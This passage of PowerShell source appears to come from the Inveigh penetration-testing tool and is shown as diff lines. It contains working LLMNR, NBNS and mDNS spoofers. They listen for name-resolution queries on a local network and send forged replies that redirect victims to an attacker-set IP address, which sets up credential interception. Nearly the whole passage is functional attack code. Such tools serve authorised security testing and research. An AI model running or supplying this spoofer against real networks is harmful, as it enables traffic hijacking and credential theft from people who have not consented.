$binary_reader.ReadBytes(($UDP_length_uint - 2) * 4) + + # Incoming packets + switch($destination_port) + { + + 137 # NBNS + { + + if(([System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -or [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01') -and [System.BitConverter]::ToString($payload_bytes[10..11]) -ne '00-01') + { + $UDP_length[0] += 12 + $NBNS_response_type = "[+]" + + $NBNS_response_data = $payload_bytes[13..$payload_bytes.Length] + + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $NBNS_response_packet = 0x00,0x89 + + $source_port[1,0] + + $UDP_length[1,0] + + 0x00,0x00 + + $payload_bytes[0,1] + + 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + + $NBNS_response_data + + $NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44]) + $NBNS_query_type = Get-NBNSQueryType $NBNS_query_type + $NBNS_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)]) + $NBNS_query = $NBNS_query -replace "-00","" + $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length) + $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA")) + $NBNS_query_string_subtracted = $null + $NBNS_query_string = $null + $n = 0 + + do + { + $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65) + $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16)) + $n++ + } + until($n -ge ($NBNS_query_string_encoded.Length)) + + $n = 0 + + do + { + $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16))) + $n += 2 + } + until($n -ge ($NBNS_query_string_subtracted.Length) -or $NBNS_query_string.Length -eq 15) + + if($NBNS_query_string -notmatch '[^\x00-\x7F]+') + { + + if(!$inveigh.request_table.ContainsKey($NBNS_query_string)) + { + $inveigh.request_table.Add($NBNS_query_string.ToLower(),[Array]$source_IP.IPAddressToString) + $inveigh.request_table_updated = $true + } + else + { + $inveigh.request_table.$NBNS_query_string += $source_IP.IPAddressToString + $inveigh.request_table_updated = $true + } + + } + + $NBNS_request_ignore = $false + + if($NBNS -eq 'Y') + { + + if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $NBNS_query_string -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -and $source_IP -ne $IP) + { + + if(($NBNS_learning_log.Exists({param($s) $s -like "20* $NBNS_query_string"}))) + { + $NBNS_learning_queue_time = [DateTime]$NBNS_learning_log.Find({param($s) $s -like "20* $NBNS_query_string"}).SubString(0,19) + + if((Get-Date) -ge $NBNS_learning_queue_time.AddMinutes($SpooferLearningInterval)) + { + $NBNS_learning_log.RemoveAt($NBNS_learning_log.FindIndex({param($s) $s -like "20* $NBNS_query_string"})) + $NBNS_learning_send = $true + } + else + { + $NBNS_learning_send = $false + } + + } + else + { + $NBNS_learning_send = $true + } + + if($NBNS_learning_send) + { + $NBNS_transaction_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $NBNS_transaction_ID_bytes = $NBNS_transaction_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $NBNS_transaction_ID = $NBNS_transaction_ID -replace " ","-" + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)] + + $NBNS_request_packet = $NBNS_transaction_ID_bytes + + 0x01,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20 + + $NBNS_hostname_bytes + + 0x00,0x20,0x00,0x01 + + $NBNS_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]::broadcast,137) + $NBNS_UDP_client.Connect($NBNS_learning_destination_endpoint) + $NBNS_UDP_client.Send($NBNS_request_packet,$NBNS_request_packet.Length) + $NBNS_UDP_client.Close() + $NBNS_learning_log.Add("$(Get-Date -format s) $NBNS_transaction_ID $NBNS_query_string") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] NBNS request $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString) > $null + } + + } + + if(($inveigh.valid_host_list -notcontains $NBNS_query_string -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and ( + !$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($NBNS_query_string.Trim() -ne '*') -and ( + $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and ($source_IP -ne $IP) -and ( + $NBNSTypes -contains $NBNS_query_type) -and ($EvadeRG -and $destination_IP.IPAddressToString -ne $IP) -and ($SpooferNonprintable -eq 'Y' -or ($SpooferNonprintable -eq 'N' -and $NBNS_query_string -notmatch '[^\x00-\x7F]+'))) + { + + if($SpooferLearning -eq 'N' -or !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $NBNS_send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp) + $NBNS_send_socket.SendBufferSize = 1024 + $NBNS_destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port) + $NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point) > $null + $NBNS_send_socket.Close() + $NBNS_response_message = "[response sent]" + } + else + { + $NBNS_request_ignore = $true + } + + } + else + { + + if($source_IP -eq $IP -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $NBNS_request_ignore = $true + } + + $NBNS_response_message = Get-SpooferResponseMessage -QueryString $NBNS_query_string -Type "NBNS" + $NBNS_response_type = $NBNS_response_message[0] + $NBNS_response_message = $NBNS_response_message[1] + } + + } + + if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00') + { + $inveigh.output_queue.Add("$NBNS_response_type [$(Get-Date -format s)] NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") > $null + } + elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + [Byte[]]$NBNS_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)] + $NBNS_response_IP = [System.Net.IPAddress]$NBNS_response_IP_bytes + $NBNS_response_IP = $NBNS_response_IP.IPAddressToString + + if($inveigh.valid_host_list -notcontains $NBNS_query_string) + { + $inveigh.valid_host_list.Add($NBNS_query_string) > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP [added to valid host list]") > $null + } + + } + + } + + } + + 5353 # mDNS + { + + if([System.BitConverter]::ToString($payload_bytes) -like '*-00-01-80-01') + { + $UDP_length[0] += 10 + $mDNS_query_payload_bytes = $payload_bytes[(12)..($payload_bytes.Length - 5)] + $mDNS_query_string = Convert-DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes + $mDNS_query_string_full = $mDNS_query_string + ".local" + $mDNS_response_type = "[+]" + + $mDNS_response_data = $mDNS_query_payload_bytes + + 0x00,0x01,0x00,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $mDNS_response_packet = 0x14,0xe9 + + $source_port[1,0] + + $UDP_length[1,0] + + 0x00,0x00 + + $payload_bytes[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_response_data + + if($mDNS -eq 'Y') + { + + if((!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and ( + !$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($mDNSTypes -contains 'QU')) + { + $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp ) + $send_socket.SendBufferSize = 1024 + $destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) + $send_socket.SendTo($mDNS_response_packet,$destination_point) > $null + $send_socket.Close() + $mDNS_response_message = "[response sent]" + } + else + { + $mDNS_response_message = Get-SpooferResponseMessage -QueryString $mDNS_query_string -Type "mDNS" -mDNSType "QU" + $mDNS_response_type = $mDNS_response_message[0] + $mDNS_response_message = $mDNS_response_message[1] + } + + } + + $inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QU) request $mDNS_query_string_full received from $source_IP $mDNS_response_message") > $null + } + elseif([System.BitConverter]::ToString($payload_bytes) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*') + { + $UDP_length[0] += 4 + $mDNS_query_payload_bytes = $payload_bytes[12..($payload_bytes[12] + 12)] + $mDNS_query_string = Convert-DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes + $mDNS_query_string_full = $mDNS_query_string + ".local" + $mDNS_response_type = "[+]" + + $mDNS_response_data = $mDNS_query_payload_bytes + + 0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 + + 0x00,0x01,0x80,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + + $mDNS_response_packet = 0x14,0xe9 + + $source_port[1,0] + + $UDP_length[1,0] + + 0x00,0x00 + + $payload_bytes[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_response_data + + if($mDNS -eq 'Y') + { + + if((!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and ( + !$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($mDNSTypes -contains 'QM')) + { + $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp) + $send_socket.SendBufferSize = 1024 + $destination_point = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.251",5353) + $send_socket.SendTo($mDNS_response_packet,$destination_point) > $null + $send_socket.Close() + $mDNS_response_message = "[response sent]" + } + else + { + $mDNS_response_message = Get-SpooferResponseMessage -QueryString $mDNS_query_string -Type "mDNS" -mDNSType "QM" + $mDNS_response_type = $mDNS_response_message[0] + $mDNS_response_message = $mDNS_response_message[1] + } + + } + + $inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QM) request $mDNS_query_string_full received from $source_IP $mDNS_response_message") > $null + } + + } + + 5355 # LLMNR + { + + if([System.BitConverter]::ToString($payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length - 3)]) -ne '00-1c') # ignore AAAA for now + { + $UDP_length[0] += $payload_bytes.Length - 2 + $LLMNR_response_data = $payload_bytes[12..$payload_bytes.Length] + $LLMNR_response_type = "[+]" + + $LLMNR_response_data += $LLMNR_response_data + + $LLMNR_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $LLMNR_response_packet = 0x14,0xeb + + $source_port[1,0] + + $UDP_length[1,0] + + 0x00,0x00 + + $payload_bytes[0,1] + + 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + + $LLMNR_response_data + + $LLMNR_query_string = [System.Text.Encoding]::UTF8.GetString($payload_bytes[13..($payload_bytes.Length - 4)]) -replace "`0","" + + if(!$inveigh.request_table.ContainsKey($LLMNR_query_string)) + { + $inveigh.request_table.Add($LLMNR_query_string.ToLower(),[Array]$source_IP.IPAddressToString) + $inveigh.request_table_updated = $true + } + else + { + $inveigh.request_table.$LLMNR_query_string += $source_IP.IPAddressToString + $inveigh.request_table_updated = $true + } + + $LLMNR_request_ignore = $false + + if($LLMNR -eq 'Y') + { + + if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $LLMNR_query_string -and $source_IP -ne $IP) + { + + if(($LLMNR_learning_log.Exists({param($s) $s -like "20* $LLMNR_query_string"}))) + { + $LLMNR_learning_queue_time = [DateTime]$LLMNR_learning_log.Find({param($s) $s -like "20* $LLMNR_query_string"}).SubString(0,19) + + if((Get-Date) -ge $LLMNR_learning_queue_time.AddMinutes($SpooferLearningInterval)) + { + $LLMNR_learning_log.RemoveAt($LLMNR_learning_log.FindIndex({param($s) $s -like "20* $LLMNR_query_string"})) + $LLMNR_learning_send = $true + } + else + { + $LLMNR_learning_send = $false + } + + } + else + { + $LLMNR_learning_send = $true + } + + if($LLMNR_learning_send) + { + $LLMNR_transaction_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $LLMNR_transaction_ID_bytes = $LLMNR_transaction_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $LLMNR_transaction_ID = $LLMNR_transaction_ID -replace " ","-" + $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient + $LLMNR_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)] + + $LLMNR_request_packet = $LLMNR_transaction_ID_bytes + + 0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00 + + ($LLMNR_hostname_bytes.Length - 1) + + $LLMNR_hostname_bytes + + 0x00,0x01,0x00,0x01 + + $LLMNR_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.252",5355) + $LLMNR_UDP_client.Connect($LLMNR_learning_destination_endpoint) + $LLMNR_UDP_client.Send($LLMNR_request_packet,$LLMNR_request_packet.Length) + $LLMNR_UDP_client.Close() + $LLMNR_learning_log.Add("$(Get-Date -format s) $LLMNR_transaction_ID $LLMNR_query_string") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] LLMNR request $LLMNR_query_string sent to 224.0.0.252") > $null + } + + } + + if(($inveigh.valid_host_list -notcontains $LLMNR_query_string -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and ( + !$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ( + $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and ( + $EvadeRG -and $destination_IP.IPAddressToString -ne $IP) -and @($inveigh.request_table.$LLMNR_query_string | Where-Object {$_ -match $source_IP.IPAddressToString}).Count -gt $SpooferThresholdHost -and @( + $inveigh.request_table.$LLMNR_query_string | Sort-Object | Get-Unique).Count -gt $SpooferThresholdNetwork -and ($SpooferNonprintable -eq 'Y' -or ($SpooferNonprintable -eq 'N' -and $LLMNR_query_string -notmatch '[^\x00-\x7F]+'))) + { + + if($SpooferLearning -eq 'N' -or !$LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $LLMNR_send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp) + $LLMNR_send_socket.SendBufferSize = 1024 + $LLMNR_destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) + $LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point) > $null + $LLMNR_send_socket.Close() + $LLMNR_response_message = "[response sent]" + } + else + { + $LLMNR_request_ignore = $true + } + + } + else + { + $LLMNR_response_message = Get-SpooferResponseMessage -QueryString $LLMNR_query_string -Type "LLMNR" + $LLMNR_response_type = $LLMNR_response_message[0] + $LLMNR_response_message = $LLMNR_response_message[1] + } + + } + + if(!$LLMNR_request_ignore) + { + $inveigh.output_queue.Add("$LLMNR_response_type [$(Get-Date -format s)] LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") > $null + } + + } + + } + + } + + switch($endpoint_source_port) + { + + 5355 # LLMNR Response + { + + if($SpooferLearning -eq 'Y' -and $LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $LLMNR_query_string = [System.Text.Encoding]::UTF8.GetString($payload_bytes[13..($payload_bytes.Length - 4)]) -replace "`0","" + [Byte[]]$LLMNR_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)] + $LLMNR_response_IP = [System.Net.IPAddress]$LLMNR_response_IP_bytes + $LLMNR_response_IP = $LLMNR_response_IP.IPAddressToString + + if($inveigh.valid_host_list -notcontains $LLMNR_query_string) + { + $inveigh.valid_host_list.Add($LLMNR_query_string) > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $LLMNR_query_string LLMNR response $LLMNR_response_IP received from $source_IP [added to valid host list]") > $null + } + + } + + } + + } + + } + + } + + } + + $binary_reader.Close() + $memory_stream.Dispose() + $memory_stream.Close() +} + +# Unprivileged LLMNR Spoofer ScriptBlock +$LLMNR_spoofer_scriptblock = +{ + param ($Inspect,$LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL) + + $LLMNR_running = $true + $LLMNR_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5355) + + try + { + $LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355 + } + catch + { + $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting LLMNR spoofer") > $null + $LLMNR_running = $false + } + + $LLMNR_multicast_group = [IPAddress]"224.0.0.252" + $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) + $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) + [Array]::Reverse($LLMNR_TTL_bytes) + + while($inveigh.running -and $LLMNR_running) + { + + try + { + $LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint) + } + catch + { + $LLMNR_UDP_client.Close() + $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_multicast_group = [IPAddress]"224.0.0.252" + $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) + $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + } + + if($LLMNR_request_data -and [System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c') # ignore AAAA for now + { + + $LLMNR_response_packet = $LLMNR_request_data[0,1] + + 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + + $LLMNR_request_data[12..$LLMNR_request_data.Length] + + $LLMNR_request_data[12..$LLMNR_request_data.Length] + + $LLMNR_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $LLMNR_query_string = [Text.Encoding]::UTF8.GetString($LLMNR_request_data[13..($LLMNR_request_data[12] + 12)]) + $source_IP = $LLMNR_listener_endpoint.Address + $LLMNR_response_type = "[+]" + + if(!$inveigh.request_table.ContainsKey($LLMNR_query_string)) + { + $inveigh.request_table.Add($LLMNR_query_string.ToLower(),[Array]$source_IP.IPAddressToString) + $inveigh.request_table_updated = $true + } + else + { + $inveigh.request_table.$LLMNR_query_string += $source_IP.IPAddressToString + $inveigh.request_table_updated = $true + } + + if(!$Inspect -and ($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP) -and ($SpooferNonprintable -eq 'Y' -or ($SpooferNonprintable -eq 'N' -and $LLMNR_query_string -notmatch '[^\x00-\x7F]+'))) + { + $LLMNR_destination_endpoint = New-Object Net.IPEndpoint($LLMNR_listener_endpoint.Address,$LLMNR_listener_endpoint.Port) + $LLMNR_UDP_client.Connect($LLMNR_destination_endpoint) + $LLMNR_UDP_client.Send($LLMNR_response_packet,$LLMNR_response_packet.Length) + $LLMNR_UDP_client.Close() + $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_multicast_group = [IPAddress]"224.0.0.252" + $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) + $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + $LLMNR_response_message = "[response sent]" + } + else + { + $LLMNR_response_message = Get-SpooferResponseMessage -QueryString $LLMNR_query_string -Type "LLMNR" + } + + if($LLMNR_request_data) + { + $inveigh.output_queue.Add("$LLMNR_response_type [$(Get-Date -format s)] LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") > $null + } + + $LLMNR_request_data = $null + } + + } + + $LLMNR_UDP_client.Close() + } + +# Unprivileged mDNS Spoofer ScriptBlock +$mDNS_spoofer_scriptblock = +{ + param ($Inspect,$mDNS_response_message,$mDNSTTL,$mDNSTypes,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore) + + $mDNS_running = $true + $mDNS_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5353) + + try + { + $mDNS_UDP_client = New-Object System.Net.Sockets.UdpClient 5353 + } + catch + { + $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting mDNS spoofer") > $null + $mDNS_running = $false + } + + $mDNS_multicast_group = [IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + $mDNS_TTL_bytes = [System.BitConverter]::GetBytes($mDNSTTL) + [Array]::Reverse($mDNS_TTL_bytes) + + while($inveigh.running -and $mDNS_running) + { + + try + { + $mDNS_request_data = $mDNS_UDP_client.Receive([Ref]$mDNS_listener_endpoint) + } + catch + { + $mDNS_UDP_client.Close() + $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353 + $mDNS_multicast_group = [IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + } + + if([System.BitConverter]::ToString($mDNS_request_data) -like '*-00-01-80-01') + { + $mDNS_response_packet = $mDNS_request_data[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_request_data[12..($mDNS_request_data.Length - 5)] + + 0x00,0x01,0x00,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $mDNS_query_string = Convert-DataToString 13 $mDNS_request_data[12] $mDNS_request_data + $mDNS_query_string_full = $mDNS_query_string + ".local" + $source_IP = $mDNS_listener_endpoint.Address + $mDNS_response_type = "[+]" + + if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $mDNSTypes -contains 'QU') -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP)) + { + $mDNS_destination_endpoint = New-Object Net.IPEndpoint($mDNS_listener_endpoint.Address,$mDNS_listener_endpoint.Port) + $mDNS_UDP_client.Connect($mDNS_destination_endpoint) + $mDNS_UDP_client.Send($mDNS_response_packet,$mDNS_response_packet.Length) + $mDNS_UDP_client.Close() + $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353 + $mDNS_multicast_group = [IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + $mDNS_response_message = "[response sent]" + } + else + { + $mDNS_response_message = Get-SpooferResponseMessage -QueryString $mDNS_query_string -Type "mDNS" -mDNSType "QU" + $mDNS_response_type = $mDNS_response_message[0] + $mDNS_response_message = $mDNS_response_message[1] + } + + if($mDNS_request_data) + { + $inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QU) request $mDNS_query_string_full received from $source_IP $LLMNR_response_message") > $null + } + + $mDNS_request_data = $null + } + elseif([System.BitConverter]::ToString($mDNS_request_data) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*') + { + $mDNS_response_packet = $mDNS_request_data[0,1] + + 0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 + + $mDNS_request_data[12..($mDNS_request_data[12] + 12)] + + 0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 + + 0x00,0x01,0x00,0x01 + + $mDNS_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $mDNS_query_string = Convert-DataToString 13 $mDNS_request_data[12] $mDNS_request_data + $mDNS_query_string_full = $mDNS_query_string + ".local" + $source_IP = $mDNS_listener_endpoint.Address + $mDNS_response_type = "[+]" + + if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $mDNSTypes -contains 'QM') -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP)) + { + $mDNS_destination_endpoint = New-Object Net.IPEndpoint([IPAddress]"224.0.0.251",5353) + $mDNS_UDP_client.Connect($mDNS_destination_endpoint) + $mDNS_UDP_client.Send($mDNS_response_packet,$mDNS_response_packet.Length) + $mDNS_UDP_client.Close() + $mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353 + $mDNS_multicast_group = [IPAddress]"224.0.0.251" + $mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group) + $mDNS_UDP_client.Client.ReceiveTimeout = 5000 + $mDNS_response_message = "[response sent]" + } + else + { + $mDNS_response_message = Get-SpooferResponseMessage -QueryString $mDNS_query_string -Type "mDNS" -mDNSType "QM" + $mDNS_response_type = $mDNS_response_message[0] + $mDNS_response_message = $mDNS_response_message[1] + } + + if($mDNS_request_data) + { + $inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QM) request $mDNS_query_string_full received from $source_IP $mDNS_response_message") > $null + } + + $mDNS_request_data = $null + } + + } + + $mDNS_UDP_client.Close() + } + +# Unprivileged NBNS Spoofer ScriptBlock +$NBNS_spoofer_scriptblock = +{ + param ($Inspect,$IP,$NBNS_response_message,$NBNSTTL,$NBNSTypes,$SpooferIP,$SpooferHostsIgnore,$SpooferHostsReply, + $SpooferIPsIgnore,$SpooferIPsReply,$SpooferNonprintable) + + $NBNS_running = $true + $NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137) + + try + { + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + } + catch + { + 